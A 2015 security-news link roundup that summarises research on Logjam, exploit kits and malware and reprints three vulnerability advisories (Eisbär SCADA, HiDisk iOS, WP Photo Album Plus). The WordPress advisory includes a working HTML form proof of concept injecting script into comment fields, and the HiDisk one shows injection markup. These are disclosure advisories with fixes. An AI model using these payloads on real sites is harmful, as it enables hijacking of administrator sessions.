iCloud is a free cloud storage and cloud computing service designed by Apple to replace MobileMe. The service allows users to store data (music, pictures, videos, and applications) on remote servers and share them on devices with iOS 5 or later operating systems, on Apple computers running OS X Lion or later, or on a PC with Windows Vista or later. Similar to its predecessor, MobileMe, iCloud allows users to synchronize data between devices (e-mail, contacts, calendars, bookmarks, notes, reminders, iWork documents, and so on), or to make a backup of an iOS device (iPhone, iPad, or iPod touch) on remote servers rather than using iTunes and your local computer.

The iCloud service was announced on June 6, 2011 during the Apple Worldwide Developers Conference but became operational to the public from October 12, 2011. The MobileMe service was disabled as a result on June 30, 2012 and all users were transferred to the new environment. In July 2013, iCloud had more than 320 million users. Each iCloud account has 5 GB of free storage for the owners of iDevice with iOS 5 or later and Mac users with Lion or later.

more here.....http://articles.forensicfocus.com/2015/05/21/evidence-acquisition-and-analysis-from-icloud/

Steam Malware

Recently the Steam community has been getting more and more flooded by malware. Upon receiving more and more attempts by bots to infect our machines with malware we decided to investigate. We have collected as many samples as possible and analyzed how they work. I've been postponing writing this article for too long since we did this. Please note that most of this research was done before the Steam update that "patched" some of these issues.

read more here....http://ioexception.at/Steam-malware/

Cloudflare: Logjam: the latest TLS vulnerability explained

Yesterday, a group from INRIA, Microsoft Research, Johns Hopkins, the University of Michigan, and the University of Pennsylvania published a deep analysis of the Diffie-Hellman algorithm as used in TLS and other protocols. This analysis included a novel downgrade attack against the TLS protocol itself called Logjam, which exploits EXPORT cryptography (just like FREAK).
First, let me start by saying that CloudFlare customers are not and were never affected. We don’t support non-EC Diffie-Hellman ciphersuites on either the client or origin side. We also won't touch EXPORT-grade cryptography with a 20ft stick.
But why are CloudFlare customers safe, and how does Logjam work anyway?

read more here......https://blog.cloudflare.com/logjam-the-latest-tls-vulnerability-explained/

Lesser-known features of afl-fuzz

AFL is designed to be simple to use, but there are quite a few advanced, time-saving features that may be easy to overlook. So, here are several useful tricks that aren't covered in README: http://lcamtuf.blogspot.com/2015/05/lesser-known-features-of-afl-fuzz.html

Wednesday, May 20, 2015

Eisbär SCADA (All Versions - iOS, Android & W8) - Persistent UI Vulnerability

Document Title:
===============
Eisbär SCADA (All Versions - iOS, Android & W8) - Persistent UI Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1456


Release Date:
=============
2015-05-19


Vulnerability Laboratory ID (VL-ID):
====================================
1456


Common Vulnerability Scoring System:
====================================
5.2


Product & Service Introduction:
===============================
Polar Bear KNX is a modern EIB or KNX visualization for all types of buildings. Applications: lighting, shading, 
heating, air conditioning,
Ventilation and security integration and integrated control reduce capital and operating costs of buildings and 
systems, Flexibility in use and 
their adaptation, comfort, safety and optimization of running processes.

(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/eisbaer/id777598405 & 
http://www.busbaer.de/newbb_plus,viewtopic,topic_id,971,forum,81.html )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered an application-side input validation vulnerability in the Eisbär 
SCADA v2.1.454.814 & v2.1.11 (iOS, Android & W8) application.


Vulnerability Disclosure Timeline:
==================================
2015-05-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Alexander Maier GmbH
Product: Eisbär SCADA - Mobile (Google Android, Windows Phone & Apple iOS) 2.1.11

Alexander Maier GmbH
Product: Eisbär SCADA - Software 2.1.454.814


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the officialEisbär SCADA v2.1.454.814 & 
v2.1.11 (iOS, Android & W8) application.
The security vulnerability allows an attacker to inject own script code to the application-side of the affected mobile 
software to compromise connected scada services.

We setup a secure environment that was able to execute scada controlled functions in our company by an android, ios and 
windows mobile device. Due to the implementation 
we discovered that the server configuration input impacts a common security risk.

The vulnerability is located in the `server name` value of the main network server settings module. Local attackers 
with physical device access are able to manipulate the 
`netzwerk server name` input to compromise the mobile application or connected eisbär scada services. The attacker 
includes a own script code payload to the servername 
and is able to execute the function in the server index listing and edit mode.

The attacker can prepare a qr code with a final configuration that impact a malicious injected server name. The 
execution of the payload occurs after the scan or on review of 
the server listing. The servername value is also in use by the Eisbär Solutions section with the DoorPhone-Knoten 
service. We verified that the main server name component can be 
used to unauthorized execute a function in the connected scada service. The servername can be changed by the app or in 
the node directly to manipulate the communication permanently.

The connection to the Polar Bear SCADA server is multi-client capable and configuration data required for the network 
settings of the app can be automatically 
transferred via QR code. In polar bears v2.1 there are also refer to a QR code component.

The security risk of the application-side web vulnerabilities are estimated as medium with a cvss (common vulnerability 
scoring system) count of 5.2. 
Exploitation of the persistent input validation web vulnerability requires a low privilege application user account and 
low user interaction (click). 
Successful exploitation of the persistent web vulnerability results in mobile application/device compromise or 
connected service component manipulation.

Request Method(s):
                                [+] [Sync]

Vulnerable Module(s):
                                [+] Home > Server (Netzwerk)

Vulnerable Parameter(s):
                                [+] servername (name)

Affected Module(s):
                                [+] Home Index Server Listing
                                [+] Edit Server Entries


Proof of Concept (PoC):
=======================
The application-side input validation web vulnerability can be exploited by local attackers with low privileged 
application user account and low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below 
to continue.

Manual steps to reproduce the vulnerability ...
1. Install the mobile application to your windows phone, ios or android mobile device
2. Start the application
3. Configure a service that is successful connected with functions
4. Surf to the existing server home index listing
5. Change the internal or external server with existing address and payload
6. Save the input
7. The execution occurs in the main index server listing
8. Click the arrow next to the injected code
9. The second execution occurs in the header section were the servername description becomes visible
10. Successful reproduce of the security vulnerability!

Note: Include as payload a server that exists and attach your payload for a successful execution! The connection to the 
Polar Bear SCADA server is 
multi-client capable and configuration data required for the network settings of the app can be automatically 
transferred via QR code. 
In polar bears v2.1 there are also refer to a QR code component.


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the netzwerk - servername value. 
Restrict the input field and disallow the usage of script code tags and  special chars.
Filter the server name output in the edit mode and parse also the index listing output with the servername.


Security Risk:
==============
The security risk of the application-side input validation vulnerability in the server configuration is estimated as 
medium. (CVSS 5.2)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () evolution-sec com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or 
its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special 
damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody 
to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - 
www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com                     - admin () 
evolution-sec com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - 
evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit 
our material contact 
(admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com
PGP KEY: http://www.vulnerability-lab.com/keys/admin () vulnerability-lab com%280x198E9928%29 txt

Lets Encrypt

Anyone who has gone through the trouble of setting up a secure website knows what a hassle getting a certificate can be. Let’s Encrypt automates away all this pain and lets site operators turn on HTTPS with a single click or shell command.

more here........https://letsencrypt.org/howitworks/

CNA Denies Cyber Insurance Claim

Cyber security, and cyber insurance, have dominated the industry headlines for several years now, but even as companies, brokers and insurers work to develop these products, there has been a dearth of case law interpreting key provisions.  This is beginning to change as disputes arise and make through way through the judicial system.

One such suit came last week when CNA filed a declaratory judgment action against its insured Cottage Health System, seeking reimbursement of both defense costs and a $4.125 million settlement it had paid out on a claim made under Cottage’s cyber policy.

more here.......http://www.privacyandsecuritymatters.com/2015/05/cna-denies-cyber-insurance-claim/

Cracking Apps Gromit! (Video)

Mark Danks talk at NSConference a month ago here......https://vimeo.com/124328842

Paper: Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice

ABSTRACT
We investigate the security of Diffie-Hellman key exchange as
used in popular Internet protocols and find it to be less secure
than widely believed. First, we present a novel flaw in TLS
that allows a man-in-the-middle to downgrade connections
to “export-grade” Diffie-Hellman. To carry out this attack,
we implement the number field sieve discrete log algorithm.
After a week-long precomputation for a specified 512-bit
group, we can compute arbitrary discrete logs in this group
in minutes. We find that 82% of vulnerable servers use a
single 512-bit group, allowing us to compromise connections
to 7% of Alexa Top Million HTTPS sites. In response, major
browsers are being changed to reject short groups.
We go on to consider Diffie-Hellman with 768- and 1024-bit
groups. A small number of fixed or standardized groups are
in use by millions of TLS, SSH, and VPN servers. Performing
precomputations on a few of these groups would allow a
passive eavesdropper to decrypt a large fraction of Internet
traffic. In the 1024-bit case, we estimate that such computations
are plausible given nation-state resources, and a
close reading of published NSA leaks shows that the agency’s
attacks on VPNs are consistent with having achieved such
a break. We conclude that moving to stronger key exchange
methods should be a priority for the Internet community

more here........https://weakdh.org/imperfect-forward-secrecy.pdf

Storm Kit – Changing the rules of the DDoS attack

Check Point researchers Liad Mizrachi & Oded Vanunu have conducted a research on the Storm Kit functionality and attack methods here.....http://blog.checkpoint.com/2015/05/20/storm-kit-changing-the-rules-of-the-ddos-attack/

Bedep Ad-Fraud Botnet Analysis – Exposing the Mechanics Behind 153.6M Defrauded Ad Impressions A Day

Following on from our post on Angler EK we are going to expose the mechanics behind the Bedep ad-fraud malware. Recently Bedep has been observed as the payload dropped by the Anger EK in a series of malvertising campaigns. These campaigns have lead to a rapid rise in the rate of Bedep infections, with Arbour Networks observing just above 80K infections over a 3-day period.

more here......http://sentrant.com/2015/05/20/bedep-ad-fraud-botnet-analysis-exposing-the-mechanics-behind-153-6m-defrauded-ad-impressions-a-day/

lightwave

VMware Lightwave is a software stack geared towards providing identity services including authentication and authorization for large-scale distributed infrastructure, applications and containers.

VMware Lightwave consists of the following primary components.

VMware Directory Service (vmdir)
VMware Certificate Authority (vmca)
VMware Authentication Framework Daemon/Service (vmafd)
VMware Secure Token Service (vmware-sts)

more here......https://github.com/vmware/lightwave

RIG Exploit Kit Infection Cycle Analysis

Happy belated birthday to RIG exploit kit! First seen around April 2014, RIG has been in the news several times over the past year. In February, the source code was reportedly leaked online, which likely spurred some of the recent changes we've observed in the kit. ThreatLabZ has been keeping an eye on RIG and in this post we'll cover an example of a full RIG infection cycle.

read more here......http://research.zscaler.com/2015/05/rig-exploit-kit-infection-cycle-analysis.html

SpyStudio Is Now Free: Create and Troubleshoot Application Virtualization Packages for Windows

SpyStudio is now free . It is a Swiss Army knife for cyber security analysts, DevOps, QA engineers, and developers.

more here......http://blog.nektra.com/main/2015/05/20/spystudio-is-now-free-create-and-troubleshoot-application-virtualization-packages-for-windows/

Defcon Quals: r0pbaby (simple 64-bit ROP)

This past weekend I competed in the Defcon CTF Qualifiers from the Legit Business Syndicate. In the past it's been one of my favourite competitions, and this year was no exception!

Unfortunately, I got stuck for quite a long time on a 2-point problem ("wwtw") and spent most of my weekend on it. But I did do a few others - r0pbaby included - and am excited to write about them, as well!

r0pbaby is neat, because it's an absolute bare-bones ROP (return-oriented programming) level. Quite honestly, when it makes sense, I actually prefer using a ROP chain to using shellcode.

more here......https://blog.skullsecurity.org/2015/defcon-quals-r0pbaby-simple-64-bit-rop

Ransomware Response Kit

I have compiled this kit to be used for security professionals and system administrators alike, in order to help streamline the process of responding to ransomware infections here....https://bitbucket.org/jadacyrus/ransomwareremovalkit/overview

Stored XSS in WP Photo Album Plus WordPress Plugin

Advisory ID: HTB23257
Product: WP Photo Album Plus WordPress Plugin
Vendor: J.N. Breetvelt
Vulnerable Version(s): 6.1.2 and probably prior
Tested Version: 6.1.2
Advisory Publication:  April 29, 2015  [without technical details]
Vendor Notification: April 29, 2015 
Vendor Patch: April 29, 2015 
Public Disclosure: May 20, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-3647
Risk Level: Medium 
CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered stored XSS vulnerability in WP Photo Album Plus WordPress plugin, 
which can be exploited to perform Cross-Site Scripting attacks against administrators of vulnerable WordPress 
installation. An attacker might be able to hijack administrator’s session and obtain full control over the vulnerable 
website.

The vulnerability exists due to the absence of filtration of user-supplied input passed via the "comname" and 
"comemail" HTTP POST parameters to "/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php" script when posting a 
comment. 

A remote attacker can post a specially crafted message containing malicious HTML or script code and execute it in 
administrator’s browser in context of the vulnerable website, when administrator views images or comments in 
administrative interface. 

A simple exploit below will store JS code in the WP database and display a JS popup window with "ImmuniWeb" word every 
time the administrator views comments or images:


<form action="http://[host]/wp-content/plugins/wp-photo-album-plus/wppa-ajax-front.php"; method="post" name="main">
<input type="hidden" name="action"  value='wppa'>
<input type="hidden" name="wppa-action"  value='do-comment'>
<input type="hidden" name="photo-id"  value='2'>
<input type="hidden" name="comment"  value='1'>
<input type="hidden" name="moccur"  value='1'>
<input type="hidden" name="comemail"  value='"><script>alert(/ImmuniWeb/);</script>'>
<input type="hidden" name="comname"  value='"><script>alert(/ImmuniWeb/);</script>'>
<input type="submit" id="btn">
</form>


The code will be automatically executed, when the administrator visits one of the following pages:

http://[host]/wp-admin/admin.php?page=wppa_manage_comments
http://[host]/wp-admin/admin.php?page=wppa_moderate_photos

-----------------------------------------------------------------------------------------------

Solution:

Update to WP Photo Album Plus 6.1.3

More Information:
https://wordpress.org/plugins/wp-photo-album-plus/changelog/

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23257 - https://www.htbridge.com/advisory/HTB23257 - Stored Cross-Site Scripting (XSS) 
in WP Photo Album Plus WordPress Plugin.
[2] WP Photo Album Plus WordPress plugin - https://wordpress.org/plugins/wp-photo-album-plus/ - This plugin is designed 
to easily manage and display your photos, photo albums, slideshows and videos in a single as well as in a network WP 
site.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public 
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE 
is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and 
cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details 
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

CVE-2015-2079: Arbitrary Command Execution in Usermin

While performing a penetration test for a customer, I stumbled across a command execution vulnerability in Usermin that is pretty trivial to identify and to exploit. The interesting part is that this vulnerability survived for almost 13 years.

more here........http://codewhitesec.blogspot.de/2015/05/cve-2015-2079-rce-usermin.html

rd

Android anti-root detection Proof of Concept here......https://github.com/serianox/rd

polygraph

Signature generation algorithms for polymorphic worms here......https://github.com/sporksmith/polygraph

JARVIS

Why JARVIS?

JARVIS means "Just Another ReVersIng Suite" or whatever other bullshit you can think of :)

What is it?

It is a plugin for IDA Pro thought to assist you in the most common reversing tasks


more here.........https://github.com/carlosgprado/JARVIS/blob/master/jarvis/docs/README.md

Exploit for SuiteCRM Post-Authentication Shell Upload (PoC Included)

SuiteCRM suffers a post-authentication shell upload vulnerability in its "Upload Company Logo" functionality, wherin it uses a blacklist in an attempt to prevent the upload of executable code. Furthermore, its "check for valid image" test leaves uploaded files in a tempdir that is web accessible. It is possible to bypass the blacklist to upload executable PHP code with the "phtml" extension to this temporary directory and thus gain code execution under the context of the webserver user on the affected system.

more here.....https://github.com/XiphosResearch/exploits/tree/master/suiteshell


lol shell

US export control of 0days and trojans is (finally) coming?

 From the Federal Register (Daily Journal of United Stated Government) A Proposed Rule by the Industry and Security Bureau on 05/20/2015 here......https://www.federalregister.gov/articles/2015/05/20/2015-11642/wassenaar-arrangement-2013-plenary-agreements-implementation-intrusion-and-surveillance-items

HiDisk 2.4 iOS - (currentFolderPath) Persistent Vulnerability

Document Title:
===============
HiDisk 2.4 iOS - (currentFolderPath) Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1496


Release Date:
=============
2015-05-19


Vulnerability Laboratory ID (VL-ID):
====================================
1496


Common Vulnerability Scoring System:
====================================
3.5


Product & Service Introduction:
===============================
HiDisk is such an app.it`s a Safe,a File Manager,a Media Player,a Files Reader. As a Safe &#65293; Provide Password System to secure your
private stuff (photo,video,audio,note,docs,etc.) As a File Manager &#65293; Easily add folder&subfolder and quickly organize your files
with few taps. As a Media Player &#65293; Play music,voice memos and video within the app. As a Files Reader - Not only provide slideshow
just like native photo app,but also provide viewing docs(iWork,Windows office,etc.)

(Copy of the Homepage:  https://itunes.apple.com/en/app/hidisk-pro-schutz-privat-foto/id575070537 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered an application-side input validation vulnerability in the HiDisk v2.4 iOS mobile application.


Vulnerability Disclosure Timeline:
==================================
2015-05-19: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Elite Tracy
Product: HiDisk - iOS Mobile Web Application 2.4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official HiDisk v2.4 iOS mobile web-application.
The vulnerability allows remote attacker or low privilege user accounts to inject malicious codes to the application-side
of the affected mobile iOS web-application.

The application-side vulnerability is located in the `name` value (currentFolderPath) of the `folder add` module. Local attackers with low
privilege user accounts are able to inject own malicious script codes via folder name input to compromise the `Wifi Web Access` interface
web-application. The attack vector is located on the application-side of the wifi web access interface and the request method to inject is
an app sync. The injection point is the add folder input and the execution occurs in the index path dir listing.

The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
Exploitation of the application-side web vulnerability requires a low privilege web-application user account and low or medium user interaction.
Successful exploitation of the vulnerabilities results in persistent phishing mails, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module context.

Request Method(s):
                                        [+] Sync

Vulnerable Module(s):
                                        [+] Folder Add (Ordner Hinzufuegen)

Vulnerable Parameter(s):
                                        [+] name (currentFolderPath)

Affected Module(s):
                                        [+] Index Path Listing
                                        [+] Subfolder Path Listing


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by local attackers with low privilege application user account and low or medium user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: #1
<a href='#' name='/"><[PERSISTENT INJECTED SCRIPT CODE!!]>' class='folder' onclick='dClickHandler(this);' style='position:relative; text-decoration:none;'>
<img class='aImg' style='' src='/Web/folder2.png' height='60px' width='60px'/><div class='name' style='position:absolute; top:1px !important; top:65px; height:17px;
left:10px !important; left:2px; width:60px; text-align:center; opacity:0.8; filter:alpha(opacity=80); color:black; font-size:10px; line-height:4px;z-index:2000;
'>"><[PERSISTENT INJECTED SCRIPT CODE!!]></div></a><a href='#' name='/hello' class='folder' onclick='dClickHandler(this);' style='position:relative; text-decoration:none;'>
<img class='aImg' style='' src='/Web/folder2.png' height='60px' width='60px'/><div class='name' style='position:absolute; top:1px !important; top:65px; height:17px;
left:10px !important; left:2px; width:60px; text-align:center; opacity:0.8; filter:alpha(opacity=80); color:black; font-size:10px; line-height:4px;z-index:2000;'>hello</div></a>
<a href='#' name='/test path var' class='folder' onclick='dClickHandler(this);' style='position:relative; text-decoration:none;'>
<img class='aImg' style='' src='/Web/folder2.png' height='60px' width='60px'/><div class='name' style='position:absolute; top:1px !important; top:65px; height:17px;
left:10px !important; left:2px; width:60px; text-align:center; opacity:0.8; filter:alpha(opacity=80); color:black; font-size:10px; line-height:4px;z-index:2000;'>
test path var</div></a><a href='#' name='/2.png' class='image' onclick='aClickHandler(this);'>
<img class='aImg' src='/2.png_THUMBNAIL' height='60px' width='60px'/></a><br/><br/><br/></div>


PoC: #2
<script type="text/javascript" src="/Web/uploadify/jquery.min.js"></script>

<script type="text/javascript" src="/Web/uploadify/jquery.uploadify.js"></script>
<script language="javascript">
var currentFolderPath = '/"><[PERSISTENT INJECTED SCRIPT CODE!!]>';

var alertMessage = "null";

var actionType = "Show";

var submitting = false;

var tipHiddenTop = -200;

var tipShownTop = -80;

var lastShownTipDate;

var uploadLimit = 2000;


if (alertMessage != "null") {

alert(alertMessage);
            }
...
 <a href="/back.html" style="text-decoration:none; position:absolute; top:0; left:0;">
<img src="/Web/back3.png" style="width:25px; height:25px; border:none; vertical-align:middle" />
Oberverzeichnis [aktuell:/"><[PERSISTENT INJECTED SCRIPT CODE!!]>]</a>
...
if (tag.className == "image") {

document.body.style.overflow = "hidden"; //&#31105;&#27490;body&#28378;&#21160;

var wrap = document.getElementById("wrap");

wrap.style.display = "block";

var src = "/" + actionType + tag.name;
wrap.innerHTML = "<iframe id='photo-viewer' src='" + src + "' style='position:absolute;width:100%;height:100%' frameborder='no' scrolling='no' allowtransparency='yes' />";
}
else {

if (!tippable()) {


Reference(s):
http://localhost:8860/


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable folder name input.
Restrict the input by disallow the usage of special chars. Encode the folder path var to prevent the persistent script code execution in the listing.


Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the folder name value is estimated as medium. (CVSS 3.5)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™